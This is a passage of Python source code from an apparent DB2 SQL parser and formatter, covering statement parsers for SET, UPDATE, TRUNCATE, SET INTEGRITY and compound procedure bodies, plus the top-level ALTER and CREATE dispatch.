if not self._match(')'):
self._parse_expression_list()
self._expect(')')
if self._match('USING'):
self._parse_expression_list()
def _parse_prepare_statement(self):
"""Parses a PREPARE statement"""
# PREPARE already matched
self._expect(TT.IDENTIFIER)
if self._match('OUTPUT'):
self._expect('INTO')
self._expect(TT.IDENTIFIER)
elif self._match('INTO'):
self._expect(TT.IDENTIFIER)
if self._match('INPUT'):
self._expect('INTO')
self._expect(TT.IDENTIFIER)
self._expect('FROM')
self._parse_expression()
def _parse_refresh_table_statement(self):
"""Parses a REFRESH TABLE statement"""
# REFRESH TABLE already matched
while True:
self._parse_table_name()
queryopt = False
if self._match('ALLOW'):
if self._match_one_of(['NO', 'READ', 'WRITE']):
self._expect('ACCESS')
elif self._match_sequence(['QUERY', 'OPTIMIZATION']):
queryopt = True
self._expect_sequence(['USING', 'REFRESH', 'DEFERRED', 'TABLES'])
self._match_sequence(['WITH', 'REFRESH', 'AGE', 'ANY'])
else:
self._expected_one_of(['NO', 'READ', 'WRITE', 'QUERY'])
if not queryopt:
if self._match_sequence(['USING', 'REFRESH', 'DEFERRED', 'TABLES']):
self._match_sequence(['WITH', 'REFRESH', 'AGE', 'ANY'])
if not self._match(','):
break
self._match('NOT')
self._match('INCREMENTAL')
def _parse_release_savepoint_statement(self):
"""Parses a RELEASE SAVEPOINT statement"""
# RELEASE [TO] SAVEPOINT already matched
self._expect(TT.IDENTIFIER)
def _parse_rename_tablespace_statement(self):
"""Parses a RENAME TABLESPACE statement"""
# RENAME TABLESPACE already matched
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.IDENTIFIER])
def _parse_rename_statement(self):
"""Parses a RENAME statement"""
# RENAME already matched
if self._match('INDEX'):
self._parse_index_name()
else:
self._match('TABLE')
self._parse_table_name()
self._expect_sequence(['TO', TT.IDENTIFIER])
def _parse_repeat_statement(self, label=None):
"""Parses a REPEAT-loop in a procedure"""
# REPEAT already matched
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
if self._match('UNTIL'):
break
else:
self._newline()
self._outdent(-1)
self._parse_search_condition()
self._expect_sequence(['END', 'REPEAT'])
if label:
self._match((TT.IDENTIFIER, label))
def _parse_resignal_statement(self):
"""Parses a RESIGNAL statement in a dynamic compound statement"""
# SIGNAL already matched
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
else:
if not self._match(TT.IDENTIFIER):
return
if self._match('SET'):
self._expect_sequence(['MESSAGE_TEXT', '='])
self._parse_expression()
def _parse_return_statement(self):
"""Parses a RETURN statement in a compound statement"""
# RETURN already matched
self._save_state()
try:
# Try and parse a select-statement
self._parse_query()
except ParseError:
# If it fails, rewind and try an expression or tuple instead
self._restore_state()
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
# If parsing an expression fails, assume it's a parameter-less
# RETURN (as can be used in a procedure)
else:
self._forget_state()
else:
self._forget_state()
def _parse_revoke_statement(self):
"""Parses a REVOKE statement"""
# REVOKE already matched
self._parse_grant_revoke(grant=False)
def _parse_rollback_statement(self):
"""Parses a ROLLBACK statement"""
# ROLLBACK already matched
self._match('WORK')
if self._match('TO'):
self._expect('SAVEPOINT')
self._match(TT.IDENTIFIER)
def _parse_savepoint_statement(self):
"""Parses a SAVEPOINT statement"""
# SAVEPOINT already matched
self._expect(TT.IDENTIFIER)
self._match('UNIQUE')
self._expect_sequence(['ON', 'ROLLBACK', 'RETAIN', 'CURSORS'])
self._match_sequence(['ON', 'ROLLBACK', 'RETAIN', 'LOCKS'])
def _parse_select_statement(self, allowinto=False):
"""Parses a SELECT statement"""
# A top-level select-statement never permits DEFAULTS, although it
# might permit INTO in a procedure
self._parse_query(allowdefault=False, allowinto=allowinto)
# Parse optional SELECT attributes (FOR UPDATE, WITH isolation, etc.)
valid = ['WITH', 'FOR', 'OPTIMIZE']
while valid:
t = self._match_one_of(valid)
if t:
self._newline(-1)
t = t.value
valid.remove(t)
else:
break
if t == 'FOR':
if self._match_one_of(['READ', 'FETCH']):
self._expect('ONLY')
elif self._match('UPDATE'):
if self._match('OF'):
self._parse_ident_list()
else:
self._expected_one_of(['READ', 'FETCH', 'UPDATE'])
elif t == 'OPTIMIZE':
self._expect_sequence(['FOR', TT.NUMBER])
self._expect_one_of(['ROW', 'ROWS'])
elif t == 'WITH':
if self._expect_one_of(['RR', 'RS', 'CS', 'UR']).value in ('RR', 'RS'):
if self._match('USE'):
self._expect_sequence(['AND', 'KEEP'])
self._expect_one_of(['SHARE', 'EXCLUSIVE', 'UPDATE'])
self._expect('LOCKS')
def _parse_set_integrity_statement(self):
"""Parses a SET INTEGRITY statement"""
def parse_access_mode():
if self._match_one_of(['NO', 'READ']):
self._expect('ACCESS')
def parse_cascade_clause():
if self._match('CASCADE'):
if self._expect_one_of(['DEFERRED', 'IMMEDIATE']).value == 'IMMEDIATE':
if self._match('TO'):
if self._match('ALL'):
self._expect('TABLES')
else:
while True:
if self._match('MATERIALIZED'):
self._expect_sequence(['QUERY', 'TABLES'])
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', 'TABLES'])
elif self._match('STAGING'):
self._expect('TABLES')
else:
self._expected_one_of(['MATERIALIZED', 'STAGING', 'FOREIGN'])
if not self._match(','):
break
def parse_check_options():
valid = [
'INCREMENTAL',
'NOT',
'FORCE',
'PRUNE',
'FULL',
'FOR',
]
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'INCREMENTAL':
valid.remove('NOT')
elif t == (TT.KEYWORD, 'NOT'):
self._expect('INCREMENTAL')
valid.remove('INCREMENTAL')
elif t == 'FORCE':
self._expect('GENERATED')
elif t == 'PRUNE':
pass
elif t == 'FULL':
self._expect('ACCESS')
elif t == 'FOR':
self._expect('EXCEPTION')
while True:
self._expect('IN')
self._parse_table_name()
self._expect('USE')
self._parse_table_name()
if not self._match(','):
break
def parse_integrity_options():
if not self._match('ALL'):
while True:
if self._match('FOREIGN'):
self._expect('KEY')
elif self._match('CHECK'):
pass
elif self._match('DATALINK'):
self._expect_sequence(['RECONCILE', 'PENDING'])
elif self._match('MATERIALIZED'):
self._expect('QUERY')
elif self._match('GENERATED'):
self._expect('COLUMN')
elif self._match('STAGING'):
pass
else:
self._expected_one_of([
'FOREIGN',
'CHECK',
'DATALINK',
'MATERIALIZED',
'GENERATED',
'STAGING',
])
if not self._match(','):
break
# SET INTEGRITY already matched
self._expect('FOR')
# Ambiguity: SET INTEGRITY ... CHECKED and SET INTEGRITY ... UNCHECKED
# have very different syntaxes, but only after initial similarities.
reraise = False
self._save_state()
try:
# Try and parse SET INTEGRITY ... IMMEDIATE CHECKED
while True:
self._parse_table_name()
if self._match(','):
reraise = True
else:
break
if self._match('OFF'):
reraise = True
parse_access_mode()
parse_cascade_clause()
elif self._match('TO'):
reraise = True
self._expect_sequence(['DATALINK', 'RECONCILE', 'PENDING'])
elif self._match('IMMEDIATE'):
reraise = True
self._expect('CHECKED')
parse_check_options()
elif self._match('FULL'):
reraise = True
self._expect('ACCESS')
elif self._match('PRUNE'):
reraise = True
else:
self._expected_one_of(['OFF', 'TO', 'IMMEDIATE', 'FULL', 'PRUNE'])
except ParseError:
# If that fails, parse SET INTEGRITY ... IMMEDIATE UNCHECKED
self._restore_state()
if reraise: raise
while True:
self._parse_table_name()
parse_integrity_options()
if self._match('FULL'):
self._expect('ACCESS')
if not self._match(','):
break
else:
self._forget_state()
def _parse_set_isolation_statement(self):
"""Parses a SET ISOLATION statement"""
# SET [CURRENT] ISOLATION already matched
self._match('=')
self._expect_one_of(['UR', 'CS', 'RR', 'RS', 'RESET'])
def _parse_set_lock_timeout_statement(self):
"""Parses a SET LOCK TIMEOUT statement"""
# SET [CURRENT] LOCK TIMEOUT already matched
self._match('=')
if self._match('WAIT'):
self._match(TT.NUMBER)
elif self._match('NOT'):
self._expect('WAIT')
elif self._match('NULL'):
pass
elif self._match(TT.NUMBER):
pass
else:
self._expected_one_of(['WAIT', 'NOT', 'NULL', TT.NUMBER])
def _parse_set_path_statement(self):
"""Parses a SET PATH statement"""
# SET [CURRENT] PATH already matched
self._match('=')
while True:
if self._match_sequence([(TT.REGISTER, 'SYSTEM'), (TT.REGISTER, 'PATH')]):
pass
elif self._match((TT.REGISTER, 'USER')):
pass
elif self._match((TT.REGISTER, 'CURRENT')):
self._match((TT.REGISTER, 'PACKAGE'))
self._expect((TT.REGISTER, 'PATH'))
elif self._match((TT.REGISTER, 'CURRENT_PATH')):
pass
else:
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
if not self._match(','):
break
def _parse_set_schema_statement(self):
"""Parses a SET SCHEMA statement"""
# SET [CURRENT] SCHEMA already matched
self._match('=')
t = self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'CURRENT_USER'),
TT.IDENTIFIER,
TT.STRING,
])
if t.type in (TT.IDENTIFIER, TT.STRING):
self.current_schema = t.value
def _parse_set_session_auth_statement(self):
"""Parses a SET SESSION AUTHORIZATION statement"""
# SET SESSION AUTHORIZATION already matched
self._match('=')
self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'CURRENT_USER'),
TT.IDENTIFIER,
TT.STRING,
])
self._match_sequence(['ALLOW', 'ADMINISTRATION'])
def _parse_set_statement(self):
"""Parses a SET statement in a dynamic compound statement"""
# SET already matched
if self._match('CURRENT'):
if self._match_sequence(['DECFLOAT', 'ROUNDING', 'MODE']):
self._match('=')
self._expect_one_of([
'ROUND_CEILING',
'ROUND_FLOOR',
'ROUND_DOWN',
'ROUND_HALF_EVEN',
'ROUND_HALF_UP',
TT.STRING,
])
if self._match('DEGREE'):
self._match('=')
self._expect(TT.STRING)
elif self._match('EXPLAIN'):
if self._match('MODE'):
self._match('=')
if self._match_one_of(['EVALUATE', 'RECOMMEND']):
self._expect_one_of(['INDEXES', 'PARTITIONINGS'])
elif self._match_one_of(['NO', 'YES', 'REOPT', 'EXPLAIN']):
pass
else:
self._expected_one_of([
'NO',
'YES',
'REOPT',
'EXPLAIN',
'EVALUATE',
'RECOMMEND',
])
elif self._match('SNAPSHOT'):
self._expect_one_of(['NO', 'YES', 'EXPLAIN', 'REOPT'])
else:
self._expected_one_of(['MODE', 'SNAPSHOT'])
elif self._match_sequence(['FEDERATED', 'ASYNCHRONY']):
self._match('=')
self._expect_one_of(['ANY', TT.NUMBER])
elif self._match_sequence(['IMPLICIT', 'XMLPARSE', 'OPTION']):
self._match('=')
self._expect(TT.STRING)
elif self._match('ISOLATION'):
self._parse_set_isolation_statement()
elif self._match_sequence(['LOCK', 'TIMEOUT']):
self._parse_set_lock_timeout_statement()
elif self._match('MAINTAINED'):
self._match('TABLE')
self._expect('TYPES')
self._match_sequence(['FOR', 'OPTIMIZATION'])
self._match('=')
while True:
if self._match_one_of(['ALL', 'NONE']):
break
elif self._match_one_of(['FEDERATED_TOOL', 'USER', 'SYSTEM']):
pass
elif self._match('CURRENT'):
self._expect('MAINTAINED')
self._match('TABLE')
self._expect('TYPES')
self._match_sequence(['FOR', 'OPTIMIZATION'])
if not self._match(','):
break
elif self._match_sequence(['MDC', 'ROLLOUT', 'MODE']):
self._expect_one_of(['NONE', 'IMMEDATE', 'DEFERRED'])
elif self._match_sequence(['OPTIMIZATION', 'PROFILE']):
self._match('=')
if not self._match(TT.STRING) and not self._match('NULL'):
self._parse_subschema_name()
elif self._match_sequence(['QUERY', 'OPTIMIZATION']):
self._match('=')
self._expect(TT.NUMBER)
elif self._match_sequence(['REFRESH', 'AGE']):
self._match('=')
self._expect_one_of(['ANY', TT.NUMBER])
elif self._match('PATH'):
self._parse_set_path_statement()
elif self._match('SCHEMA'):
self._parse_set_schema_statement()
else:
self._expected_one_of([
'DEGREE',
'EXPLAIN',
'ISOLATION',
'LOCK',
'MAINTAINED',
'QUERY',
'REFRESH',
'PATH',
'SCHEMA',
])
elif self._match_sequence(['COMPILATION', 'ENVIRONMENT']):
self._match('=')
self._expect(TT.IDENTIFIER)
elif self._match('ISOLATION'):
self._parse_set_isolation_statement()
elif self._match_sequence(['LOCK', 'TIMEOUT']):
self._parse_set_lock_timeout_statement()
elif self._match_sequence(['ENCRYPTION', 'PASSWORD']):
self._match('=')
self._expect(TT.STRING)
elif self._match_sequence(['EVENT', 'MONITOR']):
self._expect(TT.IDENTIFIER)
self._expect('STATE')
self._match('=')
self._expect(TT.NUMBER)
elif self._match('PASSTHRU'):
self._expect_one_of(['RESET', TT.IDENTIFIER])
elif self._match('PATH'):
self._parse_set_path_statement()
elif self._match('ROLE'):
self._match('=')
self._expect(TT.IDENTIFIER)
elif self._match('CURRENT_PATH'):
self._parse_set_path_statement()
elif self._match('SCHEMA'):
self._parse_set_schema_statement()
elif self._match_sequence(['SERVER', 'OPTION']):
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.STRING, 'FOR', 'SERVER', TT.IDENTIFIER])
elif self._match_sequence(['SESSION', 'AUTHORIZATION']):
self._parse_set_session_auth_statement()
elif self._match('SESSION_USER'):
self._parse_set_session_auth_statement()
else:
self._parse_assignment_clause(allowdefault=True)
def _parse_signal_statement(self):
"""Parses a SIGNAL statement in a dynamic compound statement"""
# SIGNAL already matched
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
else:
self._expect(TT.IDENTIFIER)
if self._match('SET'):
self._expect_sequence(['MESSAGE_TEXT', '='])
self._parse_expression()
elif self._match('('):
# XXX Ensure syntax only valid within a trigger
self._parse_expression()
self._expect(')')
def _parse_transfer_ownership_statement(self):
"""Parses a TRANSFER OWNERSHIP statement"""
# TRANSFER OWNERSHIP already matched
self._expect('OF')
if self._match_one_of(['ALIAS', 'TABLE', 'VIEW', 'NICKNAME', 'VARIABLE']):
self._parse_subschema_name()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_function_name()
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('('):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('INDEX'):
self._parse_index_name()
elif self._match('SEQUENCE'):
self._parse_sequence_name()
elif self._match('DISTINCT'):
self._expect('TYPE')
self._parse_type_name()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_type_name()
elif self._match('TYPE'):
self._parse_type_name()
elif (self._match_sequence(['EVENT', 'MONITOR']) or
self._match('NODEGROUP') or
self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']) or
self._match('SCHEMA') or
self._match('TABLESPACE') or
self._match('TRIGGER')):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'ALIAS',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'INDEX',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'SCHEMA',
'SEQUENCE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'TRIGGER',
'TYPE',
'VARIABLE',
'VIEW',
])
if self._match('USER'):
self._expect(TT.IDENTIFIER)
else:
self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
])
self._expect_sequence(['PERSERVE', 'PRIVILEGES'])
def _parse_truncate_statement(self):
"""Parses a TRUNCATE statement"""
# TRUNCATE already matched
self._match('TABLE')
self._parse_table_name()
if self._match_one_of(['DROP', 'REUSE']):
self._expect('STORAGE')
if self._match('IGNORE') or self._match_sequence(['RESTRICT', 'WHEN']):
self._expect_sequence(['DELETE', 'TRIGGERS'])
self._match_sequence(['CONTINUE', 'IDENTITY'])
self._expect('IMMEDIATE')
def _parse_update_statement(self):
"""Parses an UPDATE statement"""
# UPDATE already matched
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
# Ambiguity: INCLUDE is an identifier and hence can look like a table
# correlation name
reraise = False
self._save_state()
try:
# Try and parse a mandatory table correlation followed by a
# mandatory INCLUDE
self._parse_table_correlation(optional=False)
self._newline()
self._expect('INCLUDE')
reraise = True
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
except ParseError:
# If that fails, rewind and parse an optional INCLUDE or an
# optional table correlation
self._restore_state()
if reraise: raise
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
else:
self._parse_table_correlation()
else:
self._forget_state()
# Parse mandatory assignment clause allow DEFAULT values
self._expect('SET')
self._indent()
self._parse_assignment_clause(allowdefault=True)
self._outdent()
if self._match('WHERE'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match('WITH'):
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_while_statement(self, label=None):
"""Parses a WHILE-loop in a dynamic compound statement"""
# WHILE already matched
self._parse_search_condition(newlines=False)
self._newline()
self._expect('DO')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._expect('WHILE')
if label:
self._match((TT.IDENTIFIER, label))
# COMPOUND STATEMENTS ####################################################
def _parse_compiled_statement(self):
"""Parses a procedure statement within a procedure body"""
# XXX Should PREPARE be supported here?
try:
label = self._expect(TT.LABEL).value
self._newline()
except ParseError:
label = None
# Procedure specific statements
if self._match('ALLOCATE'):
self._parse_allocate_cursor_statement()
elif self._match('ASSOCIATE'):
self._parse_associate_locators_statement()
elif self._match('BEGIN'):
self._parse_compiled_compound_statement(label=label)
elif self._match('CASE'):
self._parse_case_statement()
elif self._match('CLOSE'):
self._parse_close_statement()
elif self._match_sequence(['EXECUTE', 'IMMEDIATE']):
self._parse_execute_immediate_statement()
elif self._match('EXECUTE'):
self._parse_execute_statement()
elif self._match('FETCH'):
self._parse_fetch_statement()
elif self._match('GOTO'):
self._parse_goto_statement()
elif self._match('LOOP'):
self._parse_loop_statement(label=label)
elif self._match('PREPARE'):
self._parse_prepare_statement()
elif self._match('OPEN'):
self._parse_open_statement()
elif self._match('REPEAT'):
self._parse_repeat_statement(label=label)
# Dynamic compound specific statements
elif self._match('FOR'):
self._parse_for_statement(label=label)
elif self._match_sequence(['GET', 'DIAGNOSTICS']):
self._parse_get_diagnostics_statement()
elif self._match('IF'):
self._parse_if_statement()
elif self._match('ITERATE'):
self._parse_iterate_statement()
elif self._match('LEAVE'):
self._parse_leave_statement()
elif self._match('RETURN'):
self._parse_return_statement()
elif self._match('SET'):
self._parse_set_statement()
elif self._match('SIGNAL'):
self._parse_signal_statement()
elif self._match('WHILE'):
self._parse_while_statement(label=label)
# Generic SQL statements
elif self._match('AUDIT'):
self._parse_audit_statement()
elif self._match('CALL'):
self._parse_call_statement()
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('COMMIT'):
self._parse_commit_statement()
elif self._match('CREATE'):
self._match_sequence(['OR', 'REPLACE'])
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
self._parse_create_view_statement()
elif self._match('UNIQUE'):
self._expect('INDEX')
self._parse_create_index_statement()
elif self._match('INDEX'):
self._parse_create_index_statement()
else:
self._expected_one_of(['TABLE', 'VIEW', 'INDEX', 'UNIQUE'])
elif self._match_sequence(['DECLARE', 'GLOBAL', 'TEMPORARY', 'TABLE']):
self._parse_declare_global_temporary_table_statement()
elif self._match('DELETE'):
self._parse_delete_statement()
elif self._match('DROP'):
# XXX Limit this to tables, views and indexes somehow?
self._parse_drop_statement()
elif self._match('EXPLAIN'):
self._parse_explain_statement()
elif self._match_sequence(['FLUSH', 'OPTIMIZATION', 'PROFILE', 'CACHE']):
self._parse_flush_optimization_profile_cache_statement()
elif self._match_sequence(['FREE', 'LOCATOR']):
self._parse_free_locator_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match_sequence(['LOCK', 'TABLE']):
self._parse_lock_table_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match('RELEASE'):
self._match('TO')
self._expect('SAVEPOINT')
self._parse_release_savepoint_statement()
elif self._match('RESIGNAL'):
self._parse_resignal_statement()
elif self._match('ROLLBACK'):
self._parse_rollback_statement()
elif self._match('SAVEPOINT'):
self._parse_savepoint_statement()
elif self._match_sequence(['TRANSFER', 'OWNERSHIP']):
self._parse_transfer_ownership_statement()
elif self._match('TRUNCATE'):
self._parse_truncate_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement(allowinto=True)
def _parse_compiled_compound_statement(self, label=None):
"""Parses a procedure compound statement (body)"""
# BEGIN already matched
if self._match('NOT'):
self._expect('ATOMIC')
else:
self._match('ATOMIC')
self._indent()
# Ambiguity: there's several statements beginning with DECLARE that can
# occur mixed together or in a specific order here, so we use saved
# states to test for each consecutive block of DECLAREs
# Try and parse DECLARE variable|condition|return-code
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
if self._match('SQLSTATE'):
reraise = True
self._expect_one_of(['CHAR', 'CHARACTER'])
self._expect_sequence(['(', (TT.NUMBER, 5), ')'], prespace=False)
self._match_sequence(['DEFAULT', TT.STRING])
elif self._match('SQLCODE'):
reraise = True
self._expect_one_of(['INT', 'INTEGER'])
self._match_sequence(['DEFAULT', TT.NUMBER])
else:
count = len(self._parse_ident_list())
if count == 1 and self._match('CONDITION'):
reraise = True
self._expect('FOR')
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
else:
self._parse_datatype()
if self._match('DEFAULT'):
reraise = True
self._parse_expression()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE statement
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
self._parse_ident_list()
self._expect('STATEMENT')
reraise = True
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE CURSOR
while True:
reraise = False
self._save_state()
try:
self._expect_sequence(['DECLARE', TT.IDENTIFIER, 'CURSOR'])
reraise = True
if self._match('WITH'):
if self._match('RETURN'):
self._expect('TO')
self._expect_one_of(['CALLER', 'CLIENT'])
else:
self._expect('HOLD')
if self._match('WITH'):
self._expect_sequence(['RETURN', 'TO'])
self._expect_one_of(['CALLER', 'CLIENT'])
self._expect('FOR')
# Ambiguity: statement name could be reserved word
self._save_state()
try:
# Try and parse a SELECT statement
# XXX Is SELECT INTO permitted in a DECLARE CURSOR?
self._parse_select_statement()
except ParseError:
# If that fails, rewind and parse a simple statement name
self._restore_state()
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE HANDLER
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
self._expect_one_of(['CONTINUE', 'UNDO', 'EXIT'])
self._expect('HANDLER')
reraise = True
self._expect('FOR')
self._save_state()
try:
while True:
if self._match('NOT'):
self._expect('FOUND')
else:
self._expect_one_of(['NOT', 'SQLEXCEPTION', 'SQLWARNING'])
if not self._match(','):
break
except ParseError:
self._restore_state()
while True:
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
else:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
else:
self._forget_state()
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Parse procedure statements
while not self._match('END'):
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
self._outdent(-1)
if label:
self._match((TT.IDENTIFIER, label))
def _parse_statement(self):
"""Parses a top-level statement in an SQL script"""
# XXX CREATE EVENT MONITOR
# If we're reformatting WHITESPACE, add a blank WHITESPACE token to the
# output - this will suppress leading whitespace in front of the first
# word of the statement
self._output.append(Token(TT.WHITESPACE, None, '', 0, 0))
if self._match('ALTER'):
if self._match('TABLE'):
self._parse_alter_table_statement()
elif self._match('SEQUENCE'):
self._parse_alter_sequence_statement()
elif self._match('FUNCTION'):
self._parse_alter_function_statement(specific=False)
elif self._match('PROCEDURE'):
self._parse_alter_procedure_statement(specific=False)
elif self._match('SPECIFIC'):
if self._match('FUNCTION'):
self._parse_alter_function_statement(specific=True)
elif self._match('PROCEDURE'):
self._parse_alter_procedure_statement(specific=True)
else:
self._expected_one_of(['FUNCTION', 'PROCEDURE'])
elif self._match('NICKNAME'):
self._parse_alter_nickname_statement()
elif self._match('TABLESPACE'):
self._parse_alter_tablespace_statement()
elif self._match('BUFFERPOOL'):
self._parse_alter_bufferpool_statement()
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._parse_alter_partition_group_statement()
elif self._match('DATABASE'):
self._parse_alter_database_statement()
elif self._match('NODEGROUP'):
self._parse_alter_partition_group_statement()
elif self._match('SERVER'):
self._parse_alter_server()
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._parse_alter_histogram_template_statement()
elif self._match_sequence(['AUDIT', 'POLICY']):
self._parse_alter_audit_policy_statement()
elif self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']):
self._parse_alter_security_label_component_statement()
elif self._match_sequence(['SECURITY', 'POLICY']):
self._parse_alter_security_policy_statement()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._parse_alter_service_class_statement()
elif self._match('THRESHOLD'):
self._parse_alter_threshold_statement()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._parse_alter_trusted_context_statement()
elif self._match_sequence(['USER', 'MAPPING']):
self._parse_alter_user_mapping_statement()
elif self._match('VIEW'):
self._parse_alter_view_statement()
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._parse_alter_work_action_set_statement()
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._parse_alter_work_class_set_statement()
elif self._match('WORKLOAD'):
self._parse_alter_workload_statement()
elif self._match('WRAPPER'):
self._parse_alter_wrapper_statement()
elif self._match('MODULE'):
self._parse_alter_module_statement()
else:
self._expected_one_of([
'AUDIT',
'BUFFERPOOL',
'DATABASE',
'FUNCTION',
'HISTOGRAM',
'MODULE',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'SECURITY',
'SEQUENCE',
'SERVER',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRUSTED',
'USER',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
elif self._match('AUDIT'):
self._parse_audit_statement()
elif self._match('BEGIN'):
self._parse_compiled_compound_statement()
elif self._match('CALL'):
self._parse_call_statement()
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('COMMIT'):
self._parse_commit_statement()
elif self._match('CREATE'):
self._match_sequence(['OR', 'REPLACE'])
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
self._parse_create_view_statement()
elif self._match('ALIAS'):
self._parse_create_alias_statement()
elif self._match_sequence(['UNIQUE', 'INDEX']):
self._parse_create_index_statement(unique=True)
elif self._match('INDEX'):
self._parse_create_index_statement(unique=False)
elif self._match('DISTINCT'):
self._expect('TYPE')
self._parse_create_type_statement()
elif self._match('SEQUENCE'):
self._parse_create_sequence_statement()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_create_function_mapping_statement()
elif self._match('FUNCTION'):
self._parse_create_function_statement()
elif self._match('PROCEDURE'):
self._parse_create_procedure_statement()
elif self._match('TABLESPACE'):
self._parse_create_tablespace_statement()
elif self._match('BUFFERPOOL'):
self._parse_create_bufferpool_statement()
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._parse_create_database_partition_group_statement()
elif self._match('NODEGROUP'):
self._parse_create_database_partition_group_statement()
elif self._match('TRIGGER'):
self._parse_create_trigger_statement()
elif self._match('SCHEMA'):
self._parse_create_schema_statement()
elif self._match_sequence(['AUDIT', 'POLICY']):
self._parse_create_audit_policy_statement()
elif self._match_sequence(['EVENT', 'MONITOR']):
self._parse_create_event_monitor_statement()
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._parse_create_histogram_template_statement()
elif self._match('NICKNAME'):
self._parse_create_nickname_statement()
elif self._match('ROLE'):
self._parse_create_role_statement()
elif self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']):
self._parse_create_security_label_component_statement()
elif self._match_sequence(['SECURITY', 'LABEL']):
self._parse_create_security_label_statement()
elif self._match_sequence(['SECURITY', 'POLICY']):
self._parse_create_security_policy_statement()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._parse_create_service_class_statement()
elif self._match('SERVER'):
self._parse_create_server_statement()
elif self._match('THRESHOLD'):
self._parse_create_threshold_statement()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._parse_create_trusted_context_statement()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_create_type_mapping_statement()
elif self._match('TYPE'):
self._parse_create_type_statement()
elif self._match_sequence(['USER', 'MAPPING']):
self._parse_create_user_mapping_statement()
elif self._match('VARIABLE'):
self._parse_create_variable_statement()
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._parse_create_work_action_set_statement()
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._parse_create_work_class_set_statement()
elif self._match('WORKLOAD'):
self._parse_create_workload_statement()
elif self._match('WRAPPER'):
self._parse_create_wrapper_statement()
